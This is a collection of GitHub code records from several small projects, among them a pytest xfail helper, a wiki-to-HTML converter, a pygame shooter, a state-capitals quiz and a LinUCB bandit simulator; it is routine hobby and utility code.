get_suggested_xfails(base, failed_tests) for base in base_names}\nfor k, v in result.items():\n print('=' * 50)\n print(k)\n print('=' * 50)\n print('\\n'.join(v))\n","repo_name":"pytorch/pytorch","sub_path":"test/functorch/xfail_suggester.py","file_name":"xfail_suggester.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} 
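For context on the record above: it hinges on a single regex that pulls the test id out of each `FAILED` line of a pytest run, then strips the trailing device/dtype suffix to group failures by base test. A minimal, self-contained sketch of just that parsing step (the sample pytest lines and test names below are invented for illustration, not taken from a real run):

```python
import re

# Hypothetical sample of pytest output lines, shaped like the ones parsed above.
lines = [
    "FAILED test/test_vmap.py::TestVmapOperators::test_vmap_exhaustive_mul_cpu_float32",
    "FAILED test/test_ops.py::TestGradients::test_grad_linalg_det_cuda_float32",
    "PASSED test/test_ops.py::TestGradients::test_grad_add_cpu_float32",
]

# Raw string avoids the W605 invalid-escape warning the record silences with noqa.
p = re.compile(r'FAILED test/test_\w+.py::\w+::(\S+)')

# Non-FAILED lines produce no match and are filtered out.
failed = [m.group(1) for m in map(p.match, lines) if m is not None]
print(failed)
# ['test_vmap_exhaustive_mul_cpu_float32', 'test_grad_linalg_det_cuda_float32']

# Dropping the trailing '<device>_<dtype>' pair, as remove_device_dtype does:
print(['_'.join(t.split('_')[:-2]) for t in failed])
# ['test_vmap_exhaustive_mul', 'test_grad_linalg_det']
```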
+{"seq_id":"42604813707","text":"from dataclasses import dataclass\nimport os\nimport re\nimport shutil\nimport sys\n\n\n@dataclass\nclass WikiText(object):\n\n def to_json(self):\n obj = {\n 'type': self.__class__.__name__,\n 'fields': {}\n }\n for k, v in self.__dict__.items():\n if isinstance(v, WikiText):\n obj['fields'][k] = v.to_json()\n elif isinstance(v, list):\n obj['fields'][k] = [x.to_json() for x in v]\n else:\n obj['fields'][k] = v\n return obj\n\n def to_html(self):\n return '\\n'.join(self.to_html_lines())\n\n\n@dataclass\nclass Article(WikiText):\n name: str\n parts: list\n\n def to_html_lines(self):\n return [\n '',\n '',\n ' ',\n f' ',\n ' ',\n ' ',\n ' ',\n ' ',\n ' ',\n '
',\n '

',\n ' ',\n f' {self.name}',\n '

'\n ] + [\n f' {line}'\n for part in self.parts\n for line in part.to_html_lines()\n ] + [\n '
',\n ' ',\n ''\n ]\n\n\n###\n### Multiline constructs\n###\n\n@dataclass\nclass Paragraph(WikiText):\n lines: list\n\n def to_html_lines(self):\n return [\n '

',\n ] + [\n f' {line.to_html()}' for line in self.lines\n ] + [\n '

'\n ]\n\n\n@dataclass\nclass OrderedList(WikiText):\n items: list\n\n def to_html_lines(self):\n return [\n '
    '\n ] + [\n f' {line}'\n for item in self.items\n for line in item.to_html_lines()\n ] + [\n '
'\n ]\n\n\n@dataclass\nclass UnorderedList(WikiText):\n items: list\n\n def to_html_lines(self):\n return [\n ''\n ]\n\n\n@dataclass\nclass MonospaceBlock(WikiText):\n lines: list\n\n def to_html_lines(self):\n return [\n ''\n ] + [\n f' {line.to_html()}
'\n for line in self.lines\n ] + [\n '
'\n ]\n\n###\n### Line level constructs\n###\n\n\n@dataclass\nclass ParagraphBreak(WikiText):\n def to_html_lines(self):\n return []\n\n\n@dataclass\nclass HorizontalRule(WikiText):\n def to_html_lines(self):\n return ['
']\n\n\n@dataclass\nclass Line(WikiText):\n parts: list\n\n def to_html(self):\n return ''.join([ part.to_html() for part in self.parts ])\n\n def to_html_lines(self):\n return [ self.to_html() ]\n\n\n@dataclass\nclass MonospaceLine(WikiText):\n indent: str\n parts: str\n\n def to_html(self):\n return ''.join([ part.to_html() for part in self.parts ])\n\n@dataclass\nclass UnorderedListItem(WikiText):\n indent: int\n stars: int\n parts: list\n\n def to_html_lines(self):\n return [\n '
  • '\n ] + [\n f' {line}'\n for part in self.parts\n for line in part.to_html_lines()\n ] + [\n '
  • '\n ]\n\n\n@dataclass\nclass OrderedListItem(WikiText):\n indent: str\n parts: list\n\n def to_html_lines(self):\n return [\n '
  • '\n ] + [\n f' {line}'\n for part in self.parts\n for line in part.to_html_lines()\n ] + [\n '
  • '\n ]\n\n\n@dataclass\nclass Definition(WikiText):\n term: list\n definition: list\n\n def to_html_lines(self):\n return [\n '
    ',\n f'
    {\"\".join([ part.to_html() for part in self.term ])}
    ',\n f'
    {\"\".join([ part.to_html() for part in self.definition ])}
    ',\n '
    '\n ]\n\ndef separate_paragraphs(lines):\n\n par_lines = paragraph_lines(lines)\n\n return par_lines\n\n\n# detect each kind of line and parse it\ndef paragraph_lines(lines):\n lines = [*lines]\n par_lines = []\n\n while lines:\n l = lines[0]\n lines = lines[1:]\n\n # detect paragraph breaks by whitspace lines\n if re.match(r'^\\s*$', l):\n par_lines.append(ParagraphBreak())\n continue\n\n # detect horizontal rules\n m = re.match(r'^-----*([^-]*)$', l)\n if m:\n par_lines.append(HorizontalRule())\n rest = m.group(1)\n if rest != '':\n lines = [rest] + lines\n continue\n\n # detect unordered list items\n m = re.match(r'^(\\s*)(\\*+)([^\\*].*)$', l)\n if m:\n indent = len(m.group(1))\n stars = len(m.group(2))\n text = m.group(3)\n par_lines.append(UnorderedListItem(indent, stars, [Line(convert_text(text))]))\n continue\n\n # detect ordered list items\n m = re.match(r'^(\\s*)\\d+\\.?([^\\*].*)$', l)\n if m:\n indent = len(m.group(1))\n text = m.group(2)\n par_lines.append(OrderedListItem(indent, [Line(convert_text(text))]))\n continue\n\n # detect a definition\n m = re.match(r'^\\t([^:]+):\\t(.*)$', l)\n if m:\n term = m.group(1)\n definition = m.group(2)\n par_lines.append(Definition(\n convert_text(term), convert_text(definition)))\n continue\n\n # detect monospace font\n m = re.match(r'^(\\s+)([^ ].*)$', l)\n if m:\n indent = m.group(1)\n text = m.group(2)\n par_lines.append(MonospaceLine(indent, convert_text(text)))\n continue\n\n par_lines.append(Line(convert_text(l)))\n\n return par_lines\n\n# combine lines into higher level structures\n\n\ndef group_by(xs, f):\n groups = []\n\n for x in xs:\n if len(groups) == 0 or f(x) != groups[-1][0]:\n groups.append((f(x), []))\n\n groups[-1][1].append(x)\n\n return groups\n\n\ndef convert_group(cls, items):\n\n if cls == ParagraphBreak:\n return []\n\n elif cls == HorizontalRule:\n return items\n\n elif cls == Line:\n return [Paragraph(items)]\n\n elif cls == MonospaceLine:\n return [MonospaceBlock(items)]\n\n elif cls == Definition:\n return items\n\n elif cls == 'ListItem':\n return convert_lists(items)\n\n raise ValueError(cls)\n\n\ndef total_indent(li):\n if isinstance(li, OrderedListItem):\n return li.indent\n elif isinstance(li, UnorderedListItem):\n return li.indent + li.stars-1\n\n\ndef convert_lists(items):\n parts = []\n\n for item in items:\n if len(parts) == 0:\n parts.append((item, []))\n elif total_indent(item) == total_indent(parts[0][0]):\n parts.append((item, []))\n else:\n parts[-1][1].append(item)\n\n\n new_items = []\n for root, subitems in parts:\n # print('------------------')\n # print(f'ROOT: {root}')\n # print(subitems)\n root.parts += convert_lists(subitems)\n new_items.append(root)\n # exit()\n grouped_items = group_by(new_items, lambda x: x.__class__)\n\n lists = []\n for cls, lis in grouped_items:\n if cls == UnorderedListItem:\n lists.append(UnorderedList(lis))\n elif cls == OrderedListItem:\n lists.append(OrderedList(lis))\n\n return lists\n\n\ndef convert_items(items):\n def f(x):\n if isinstance(x, OrderedListItem) or isinstance(x, UnorderedListItem):\n return 'ListItem'\n else:\n return x.__class__\n print(f'groups {groups}')\n groups = group_by(items, f)\n return [\n item\n for cls, items2 in groups\n for item in convert_group(cls, items2)\n ]\n\n\n# def group_\n\n###\n### Sub-line level constructs\n###\n\n\n@dataclass\nclass Text(WikiText):\n text: str\n\n def to_html(self):\n return self.text\n\n\n@dataclass\nclass WikiWord(WikiText):\n wikiword: str\n\n def to_html(self):\n if self.wikiword in 
KNOWN_TITLES:\n            return f'<a href=\"{BASE_URL}/{self.wikiword}.html\">{self.wikiword}</a>'\n        else:\n            return self.wikiword\n\n@dataclass\nclass URL(WikiText):\n    url: str\n\n    def to_html(self):\n        if re.search(r'(jpe?g|png|gif|webp)', self.url, flags=re.IGNORECASE):\n            return f'<img src=\"{self.url}\"/>'\n        else:\n            return f'<a href=\"{self.url}\">{self.url}</a>'\n\n\n@dataclass\nclass Italic(WikiText):\n    parts: list\n\n    def to_html(self):\n        return f'<i>{\"\".join([ part.to_html() for part in self.parts ])}</i>'\n\n\n@dataclass\nclass Bold(WikiText):\n    parts: list\n\n    def to_html(self):\n        return f'<b>{\"\".join([ part.to_html() for part in self.parts ])}</b>'\n\n\ndef read_leaf_text(text):\n    m = re.match(\"[^']+('[^']+)*|('[^']+)+\", text)\n    if not m:\n        return None\n    end = len(m.group(0))\n    return (Text(text[:end]), text[end:])\n\n\ndef read_leaf_italic(text):\n    m = re.match(\"''\", text)\n    if not m:\n        return None\n\n    res = read_leaf_text(text[2:])\n    if not res:\n        return None\n\n    leaf_text, rest = res\n\n    m2 = re.match(\"''\", rest)\n    if not m2:\n        return None\n\n    return Italic([leaf_text]), rest[2:]\n\n\ndef read_leaf_italic_no_close(text):\n    m = re.match(\"''\", text)\n    if not m:\n        return None\n\n    res = read_leaf_text(text[2:])\n    if not res:\n        return None\n\n    leaf_text, rest = res\n    if rest != '':\n        return None\n\n    return Italic([leaf_text]), ''\n\n\ndef read_leaf_bold(text):\n    m = re.match(\"'''\", text)\n    if not m:\n        return None\n\n    res = read_leaf_text(text[3:])\n    if not res:\n        return None\n\n    leaf_text, rest = res\n\n    m2 = re.match(\"'''\", rest)\n    if not m2:\n        return None\n\n    return Bold([leaf_text]), rest[3:]\n\n\ndef read_leaf_bold_no_close(text):\n    m = re.match(\"'''\", text)\n    if not m:\n        return None\n\n    res = read_leaf_text(text[3:])\n    if not res:\n        return None\n\n    leaf_text, rest = res\n    if rest != '':\n        return None\n\n    return Bold([leaf_text]), ''\n\n\ndef read_italic(text):\n    m = re.match(\"''\", text)\n    if not m:\n        return None\n\n    text = text[2:]\n    parts = []\n\n    while True:\n        m2 = re.match(\"''\", text)\n        if m2:\n            text = text[2:]\n            break\n\n        res = read_leaf_text(text) or read_leaf_bold(text)\n        if res:\n            part, rest = res\n            parts.append(part)\n            text = rest\n            continue\n\n        return None\n\n    return Italic(parts), text\n\n\ndef read_italic_no_close(text):\n    m = re.match(\"''\", text)\n    if not m:\n        return None\n\n    text = text[2:]\n    parts = []\n\n    while True:\n        if text == '':\n            break\n\n        res = read_leaf_text(text) or read_leaf_bold(text)\n        if res:\n            part, rest = res\n            parts.append(part)\n            text = rest\n            continue\n\n        res = read_leaf_bold_no_close(text)\n        if res:\n            part, _ = res\n            parts.append(part)\n            break\n\n        return None\n\n    return Italic(parts), ''\n\n\ndef read_bold(text):\n    m = re.match(\"'''\", text)\n    if not m:\n        return None\n\n    text = text[3:]\n    parts = []\n\n    while True:\n        m2 = re.match(\"'''\", text)\n        if m2:\n            text = text[3:]\n            break\n\n        res = read_leaf_text(text) or read_leaf_italic(text)\n        if res:\n            part, rest = res\n            parts.append(part)\n            text = rest\n            continue\n\n        return None\n\n    return Bold(parts), text\n\n\ndef read_bold_no_close(text):\n    m = re.match(\"'''\", text)\n    if not m:\n        return None\n\n    text = text[3:]\n    parts = []\n\n    while True:\n        if text == '':\n            break\n\n        res = read_leaf_text(text) or read_leaf_italic(text)\n        if res:\n            part, rest = res\n            parts.append(part)\n            text = rest\n            continue\n\n        res = read_leaf_italic_no_close(text)\n        if res:\n            part, _ = res\n            parts.append(part)\n            break\n\n        return None\n\n    return Bold(parts), ''\n\n\ndef read_six_single_quotes(text):\n    m = re.match(\"''''''\", text)\n    if not m:\n        return None\n\n    return text[6:]\n\n\ndef convert_text(text):\n    parts = []\n    
urls = []\n start_part = 0\n for m in re.finditer(r\"\\b(https?|ftps?|gopher|mailto|news):[A-Za-z0-9\\-\\._~:/\\?#\\[\\]@!\\$&'\\(\\)\\*\\+\\,\\;\\%\\=]+\", text):\n url_start = m.start()\n url_end = m.end()\n parts.append(convert_text_no_urls(text[start_part:url_start]))\n urls.append(text[url_start:url_end])\n start_part = url_end\n parts.append(convert_text_no_urls(text[start_part:]))\n\n converted = []\n for i in range(len(urls)):\n converted += parts[i]\n converted.append(URL(urls[i]))\n converted += parts[-1]\n return converted\n\ndef convert_text_no_urls(text):\n parts = []\n wikiwords = []\n start_part = 0\n for m in re.finditer(r'\\b([A-Z][a-z]+([A-Z][a-z]*)+)\\b', text):\n ww_start = m.start()\n ww_end = m.end()\n parts.append(convert_text_no_urls_no_wikiwords(text[start_part:ww_start]))\n wikiwords.append(text[ww_start:ww_end])\n start_part = ww_end\n parts.append(convert_text_no_urls_no_wikiwords(text[start_part:]))\n\n converted = []\n for i in range(len(wikiwords)):\n converted += parts[i]\n converted.append(WikiWord(wikiwords[i]))\n converted += parts[-1]\n return converted\n\ndef convert_text_no_urls_no_wikiwords(text):\n text = text.replace(\"''''''\", '')\n parts = []\n\n under_single_quotes = False\n while text:\n res = read_six_single_quotes(text)\n if res:\n text = res\n continue\n\n res = read_leaf_text(text) or\\\n read_bold(text) or\\\n read_bold_no_close(text) or\\\n read_italic(text) or\\\n read_italic_no_close(text) or\\\n None\n if res:\n part, text = res\n parts.append(part)\n # print(part, text)\n continue\n\n first = text[0]\n res = read_leaf_text(text[1:])\n if not res:\n text = text[1:]\n parts.append(Text(first))\n else:\n part, text = res\n parts.append(Text(first + part.text))\n\n # print(parts)\n\n return parts\n\n\ndef title(s):\n return ' '.join([\n m.group(0)\n for m in re.finditer(r'[A-Z][a-z]+', s)\n ])\n\n\ndef process_article(in_article_path, out_dir_path):\n m = re.search(r'.*/([A-Za-z]+)\\.txt$', in_article_path)\n if not m:\n return None\n\n t = m.group(1)\n\n with open(in_article_path, 'r') as f:\n lines = f.read().split('\\n')\n\n # print('\\n'.join(lines))\n lines = separate_paragraphs(lines)\n article = Article(title(t), convert_items(lines))\n\n with open(os.path.join(out_dir_path, t + '.html'), 'w') as f:\n f.write(article.to_html())\n\nif __name__ == '__main__':\n if len(sys.argv) != 4:\n print('please provide an input directory path, output directory path, and a base url')\n exit()\n\n in_dir_path = sys.argv[1]\n out_dir_path = sys.argv[2]\n BASE_URL = sys.argv[3]\n\n if not os.path.isdir(in_dir_path):\n print('input directory path is not a directory')\n exit()\n\n if not os.path.isdir(out_dir_path):\n print('output directory path is not a directory')\n exit()\n\n shutil.copy('wiki.gif', out_dir_path)\n shutil.copy('style.css', out_dir_path)\n\n for root, _, files in os.walk(in_dir_path):\n KNOWN_TITLES = [ name[:-4] for name in files ]\n for i, file in enumerate(sorted(files)):\n print(f'Processing {i/len(files): >4.1%}: {os.path.join(in_dir_path, file)}...')\n process_article(os.path.join(in_dir_path, file), out_dir_path)\n\n # with open(in_path, 'r') as f:\n # lines = f.read().split('\\n')\n #\n # # print('\\n'.join(lines))\n # lines = separate_paragraphs(lines)\n # article = Article(title('ThisIsTheTitle'), convert_items(lines))\n #\n # for line in article.to_html_lines():\n # 
print(line)\n","repo_name":"BekaValentine/c2_wiki_recovery","sub_path":"processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":16437,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"14790843261","text":"\nimport pygame\nfrom player import Player\nfrom monster import Alien, Monster, Mummy\nfrom comet_event import CometFallEvent\nfrom sounds import SoundManager\n\nclass Game:\n def __init__(self):\n # est-ce que le jeu est lancer ou non ?\n self.is_playing = False\n # generer notre joueur\n # groupe de sprite de joueur ? \n self.all_players = pygame.sprite.Group()# groupe de sprite vierge\n self.player = Player(self)\n self.all_players.add(self.player)\n # generer un manageur de chute de comette\n self.comet_event = CometFallEvent(self)\n # on met le score à 0\n self.score = 0\n\n # on viens gerer le son\n self.sound_manager = SoundManager()\n \n # charger notre police custom\n self.font = pygame.font.Font('Dancing_Script/static/DancingScript-Bold.ttf', 50)\n\n # groupe de monstre\n self.all_monsters = pygame.sprite.Group()# groupe de sprite vierge\n # on enregistre les touche active par le joueur\n self.pressed = {}\n\n def start(self):\n self.is_playing = True\n self.spawn_monster(Mummy)\n self.spawn_monster(Mummy)\n self.spawn_monster(Alien)\n\n def add_score(self, point=10):\n self.score += point\n\n def game_over(self):\n # retirer les monstres, remettre les point de vie du joueur, et mettre le jeu en pause\n # retirer les monstre\n self.all_monsters = pygame.sprite.Group()\n #retirer les cometes\n self.comet_event.all_comets = pygame.sprite.Group()\n # restaurer la bar de chargement\n self.comet_event.reset_percent()\n # remettre les points de vie du joueur\n self.player.health = self.player.max_health\n # remettre le jeu en pause\n self.is_playing = False\n # on remet le score à zero \n self.score = 0\n # on viens jouer le son\n self.sound_manager.play('game_over')\n\n def update(self, screen):\n\n score_text = self.font.render(f'Score: {self.score}', 1, (0, 0, 0))\n # on inject sur la fenetre\n screen.blit(score_text, (20, 20))\n \n # récuperer l'animation du joueur\n self.player.update_animation()\n # appliquer l'image de notre joueur\n screen.blit(self.player.image, self.player.rect)# (largeur, hauteur)\n # actualiser la bar de vie du joueur\n self.player.update_health_bar(screen)\n\n self.comet_event.update_bar(screen)\n\n\n # recuperer les projectille du joueur\n for projectile in self.player.all_projectiles:\n projectile.move()\n # appliquer l'ensemble des images de nos projectiles\n self.player.all_projectiles.draw(screen)\n\n # recuperer les comets de notre jeux\n for comet in self.comet_event.all_comets:\n comet.fall()\n # appliquer l'ensemble des images de nos comets\n self.comet_event.all_comets.draw(screen)\n\n\n\n # recuperer les monstre de notre jeux\n for monster in self.all_monsters:\n monster.forward()\n monster.update_health_bar(screen)\n monster.update_animation()\n # appliquer l'image du monstre\n self.all_monsters.draw(screen)\n\n # verifier si le joueur souhaite aller à droite ou à gauche\n if self.pressed.get(pygame.K_RIGHT) and self.player.rect.x + self.player.rect.width < screen.get_width() + 75:\n self.player.move_right()\n \n elif self.pressed.get(pygame.K_LEFT) and self.player.rect.x > -75:\n self.player.move_left()\n\n def spawn_monster(self, monster_classe_name):\n self.all_monsters.add(monster_classe_name.__call__(self))# call permet d'instancier l'objet\n\n def 
check_collision(self, sprite, group):\n        return pygame.sprite.spritecollide(sprite, group, False, pygame.sprite.collide_mask)\n\n","repo_name":"zocainViken/pygame","sub_path":"tuto_graven_shooter/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3866,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13097313319","text":"from src.domain.command_pattern import *\nimport functools\n\n\nclass RedoService:\n    def __init__(self, redo_repository, undo_repository):\n        self.__data = redo_repository\n        self.__undo_repository = undo_repository\n\n    def add_in(self, function_redo, down_redo, parameters_redo, function_undo, down_undo\n               , parameters_undo):\n        redo_operation = undo(function_redo, *parameters_redo)\n        undo_operation = undo(function_undo, *parameters_undo)\n        self.__data.add_in(redo_operation, down_redo, undo_operation, down_undo)\n\n    def pop_out(self):\n        next = True\n        operations = []\n        while next == True:\n            redo_operation, down_redo, undo_operation, down_undo = self.__data.pop_operation()\n            next = down_redo\n            if redo_operation.function is not None:\n                execute = functools.partial(redo_operation.function, *redo_operation.parameters)\n                execute()\n            operations.append((redo_operation, down_redo, undo_operation, down_undo))\n        for index in range(len(operations) - 1, -1, -1):\n            self.__undo_repository.add_operation(operations[index][2], operations[index][3], operations[index][0],\n                                                 operations[index][1])\n        # return redo_operation, down_redo, undo_operation, down_undo\n\n    def clear(self):\n        self.__data.clear()\n","repo_name":"davidalexandru1370/a678fp","sub_path":"services/redo_service.py","file_name":"redo_service.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29048389330","text":"#Kris Hanks\n#COE332 - Homework 1\n\nimport names\n\ndiffnames = [] #stores the different names\n\ni = 0 #counts the number of diff names\nwhile i in range(5):\n    tempname = names.get_full_name()\n    #check if its a different name\n    if tempname not in diffnames:\n        #print the name\n        print( tempname, len(tempname), sep = ', ')\n        #add the new name to the list\n        diffnames.append(tempname)\n        #increase count of names found\n        i +=1\n\n\n","repo_name":"khanks0217/homework01","sub_path":"script03.py","file_name":"script03.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39358965556","text":"def main():\r\n    number = int(input().strip())\r\n    num = 1\r\n    count = 0\r\n    for _ in range(number):\r\n        if count < num:\r\n            count += 1\r\n        else:\r\n            num += 1\r\n            count = 1\r\n\r\n        print(num, end=\" \")\r\n\r\n\r\n# start program\r\nmain()","repo_name":"igaryok/stepik_python","sub_path":"sequance.py","file_name":"sequance.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30645606420","text":"import csv\nimport sys\nfrom tabulate import tabulate\n\ndef table(infile):\n    table = []\n    for row in infile:\n        table.append(row)\n    return tabulate(table[1:], table[0], tablefmt=\"grid\")\n\nif len(sys.argv) < 2:\n    sys.exit(\"Too few command-line arguments\")\nelif len(sys.argv) > 2:\n    sys.exit(\"Too many command-line arguments\")\nelif (sys.argv[1][-3:] != \"csv\"):\n    sys.exit(\"Not a CSV file\")\nelse:\n    while True:\n        try:\n            with open(sys.argv[1]) as csvfile:\n                reader = 
csv.reader(csvfile)\n print(table(reader))\n sys.exit(0)\n except FileNotFoundError:\n sys.exit(\"File does not exist\")","repo_name":"nashira26/CS50","sub_path":"CS50P - 2022/Week 6/pizza/pizza.py","file_name":"pizza.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26324167147","text":"from capitals import states\nimport random\n\n# correct +=1\n# wrong +=5\n\n# print(f\"# correct = {correct} and number incorrect = {wrong} \\n\")\n# print(states)\nprint(\"Welcome to the states and Capitals game. You'll be given a State, enter the Capital if you know it. Type it with a Cap letter where appropriate... ex...atlanta incorrect Atlanta correct\")\n\ndef states_caps_game():\n random.shuffle(states)\n correct = 0\n wrong = 0\n hint = 'hint'\n\n for state in states:\n this_state = state['name']\n this_capital = state['capital']\n print(\"remember to Capatialize .. atlanta incorrect but Atlanta correct\")\n print(\" Your current question is below ... \")\n user_input = input(\n f\"What is the capital of {this_state}? You stuck? type hint for a clue\\n\")\n\n if user_input == hint:\n user_input = input(\n f\"What is the capital of {this_state}? ... hint it starts with ... {this_capital[0]}{this_capital[1]}{this_capital[2]}\\n\")\n if user_input == this_capital:\n correct += 1\n print(\n f\" you got it right ... # correct = {correct} and number incorrect = {wrong} \\n\")\n else:\n wrong += 1\n print(\n f\" that was not right it was {this_capital}... # correct = {correct} and number incorrect = {wrong} \\n\")\n elif user_input == this_capital:\n correct += 1\n print(\n f\" you got it right ... # correct = {correct} and number incorrect = {wrong} \\n\")\n else:\n wrong += 1\n print(\n f\" that was not right it was {this_capital}... # correct = {correct} and number incorrect = {wrong} \\n\")\n\n print(\n f\"That's all of them . Final score for you was ... # correct = {correct} and number incorrect = {wrong} \\n\")\n\n play_again = input(\"Wanna do it all over again? type yes or no \\n\")\n if play_again == \"yes\":\n states_caps_game()\n else:\n print(\"Well so long now and bye-bye then... thanks for playing\")\n exit()\n\nstates_caps_game()\n","repo_name":"BrianLoveGa/state-capitals-python","sub_path":"lib/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25830667817","text":"'''o. 
Dado un número entero, cuente sus divisores enteros exactos.\r\nSolución\r\nVariables\r\nn: número entero positivo (dato)\r\nx: cada número entero entre 1 y n, posible divisor de n\r\nc: cantidad de divisores'''\r\n\r\nn=int(input('Ingrese un entero positivo: '))\r\nc=0\r\nfor d in range (1,n+1):\r\n if n%d==0:\r\n c=c+1\r\nprint('Cantidad de divisores: ',c)","repo_name":"Snake111213/scrips-para-los-alunmos","sub_path":"Ejercicios para los alunmnos/DivisoresDeUnEntero.py","file_name":"DivisoresDeUnEntero.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28756379066","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nimport ast\nfrom tqdm import tqdm\n\n\n\n# Create class object for a single linear ucb arm\nclass linucb_arm():\n\n def __init__(self, arm_index, d, alpha):\n # Track arm index\n self.arm_index = arm_index\n\n # Keep track of alpha\n self.alpha = alpha\n self.N = 0\n\n def calc_UCB(self, x_array, theta, A):\n # Find A inverse for ridge regression\n A_inv = np.linalg.inv(A)\n # print(\"A:\", A)\n\n # Reshape covariates input into (d x 1) shape vector\n x = x_array.reshape([-1, 1])\n # print(\"x:\",x)\n # Find ucb based on p formulation (mean + std_dev)\n # p is (1 x 1) dimension vector\n p = np.dot(theta.T, x) + self.alpha * np.sqrt(np.dot(x.T, np.dot(A_inv, x)))\n # print('p:',p)\n return p\n\n def update(self):\n self.N += 1\n\n\nclass linucb_policy():\n\n def __init__(self, K_arms, d, alpha):\n self.K_arms = K_arms\n self.linucb_arms = [linucb_arm(arm_index=i, d=d, alpha=alpha) for i in range(K_arms)]\n self.chosen_arm = -1\n self.d = d\n self.theta = None\n # Random Arm Context Generation\n self.arm_context = [np.random.random((10, 1)) for i in range(0,self.K_arms)]\n\n\n # A: (d x d) matrix = D_a.T * D_a + I_d.\n # The inverse of A is used in ridge regression\n self.A = np.identity(d)\n\n # b: (d x 1) corresponding response vector.\n # Equals to D_a.T * c_a in ridge regression formulation\n self.b = np.zeros([d, 1])\n\n def calc_theta(self):\n A_inv = np.linalg.inv(self.A)\n self.theta = np.dot(A_inv, self.b)\n return self.theta\n\n def reward_update(self, reward, x):\n # Reshape covariates input into (d x 1) shape vector\n x = x.reshape([-1, 1])\n\n # Update A which is (d * d) matrix.\n self.A += np.dot(x, x.T)\n\n # Update b which is (d x 1) vector\n # reward is scalar\n self.b += reward * x\n\n def printBandits(self):\n print(\"num times selected each bandit:\", [b.N for b in self.linucb_arms])\n\n def calculate_projection(self,arm_index, user_features, arm_features):\n context = np.zeros((1010, 1))\n context[arm_index*10:arm_index*10+100] = user_features\n context[1000:] = arm_features\n return context\n\n\n def select_arm(self, x_array):\n # Initiate ucb to be 0\n highest_ucb = -10\n\n # Track index of arms to be selected on if they have the max UCB.\n candidate_arms = []\n theta = self.calc_theta()\n\n for arm_index in range(self.K_arms):\n # Calculating projection of user on the arm\n user_context = x_array\n arm_context = self.arm_context[arm_index]\n projection = self.calculate_projection(arm_index, user_context, arm_context)\n\n # Calculate ucb based on each arm using current covariates at time t\n\n arm_ucb = self.linucb_arms[arm_index].calc_UCB(projection, theta,\n self.A)\n # If current arm is highest than current highest_ucb\n if arm_ucb > highest_ucb:\n # Set new max ucb\n highest_ucb = arm_ucb\n\n # Reset candidate_arms list with new 
entry based on current arm\n candidate_arms = [arm_index]\n\n # If there is a tie, append to candidate_arms\n if arm_ucb == highest_ucb:\n if arm_index not in candidate_arms:\n candidate_arms.append(arm_index)\n\n # Choose based on candidate_arms randomly (tie breaker)\n # print('last step:', candidate_arms)\n chosen_arm = np.random.choice(candidate_arms)\n self.linucb_arms[chosen_arm].update()\n self.chosen_arm = chosen_arm\n\n return chosen_arm\n\n\n\ndef ctr_simulator(K_arms, d, alpha, data_path):\n # Initiate policy\n linucb_policy_object = linucb_policy(K_arms=K_arms, d=d, alpha=alpha)\n\n # Instantiate trackers\n aligned_time_steps = 0\n cumulative_rewards = 0\n aligned_ctr = []\n unaligned_ctr = [] # for unaligned time steps\n\n # Open data\n with open(data_path, \"r\") as f:\n\n for line_data in tqdm(f, total=10000):\n\n # 1st column: Logged data arm.\n # Integer data type\n data_arm = int(line_data.split()[0])\n\n # 2nd column: Logged data reward for logged chosen arm\n # Float data type\n data_reward = float(line_data.split()[1])\n\n # 3rd columns onwards: 100 covariates. Keep in array of dimensions (100,) with float data type\n covariate_string_list = line_data.split()[2:]\n data_x_array = np.array([float(covariate_elem) for covariate_elem in covariate_string_list])\n data_x_array = np.linalg.norm(data_x_array)\n # Find policy's chosen arm based on input covariates at current time step\n arm_index = linucb_policy_object.select_arm(data_x_array)\n\n # Check if arm_index is the same as data_arm (ie same actions were chosen)\n # Note that data_arms index range from 1 to 10 while policy arms index range from 0 to 9.\n if arm_index + 1 == data_arm:\n # calculating projection\n user_context = data_x_array\n arm_context = linucb_policy_object.arm_context[arm_index]\n projection = linucb_policy_object.calculate_projection(arm_index, user_context, arm_context)\n # Use reward information for the chosen arm to update\n\n linucb_policy_object.reward_update(data_reward, projection)\n\n # For CTR calculation\n aligned_time_steps += 1\n cumulative_rewards += data_reward\n aligned_ctr.append(cumulative_rewards / aligned_time_steps)\n linucb_policy_object.printBandits()\n return aligned_time_steps, cumulative_rewards, aligned_ctr, linucb_policy_object\n\n\nif __name__ == \"__main__\":\n argv = sys.argv\n # alpha_inputs = ast.literal_eval(argv[1])\n alpha_inputs = [0.1]\n data_path = \"data/news_dataset.txt\"\n for alpha in alpha_inputs:\n print(f\"Trying with alpha = {alpha}\")\n aligned_time_steps, cum_rewards, aligned_ctr, policy = ctr_simulator(K_arms=10, d=1010, alpha=alpha,\n data_path=data_path)\n print(\"Cumulative Reward: \", cum_rewards)\n plt.plot(aligned_ctr, label=\"alpha = \" + str(alpha))\n plt.ylabel(\"CTR ratio (For Single Theta)\")\n plt.xlabel(\"Time(50 random arm covarriates)\")\n plt.legend()\n 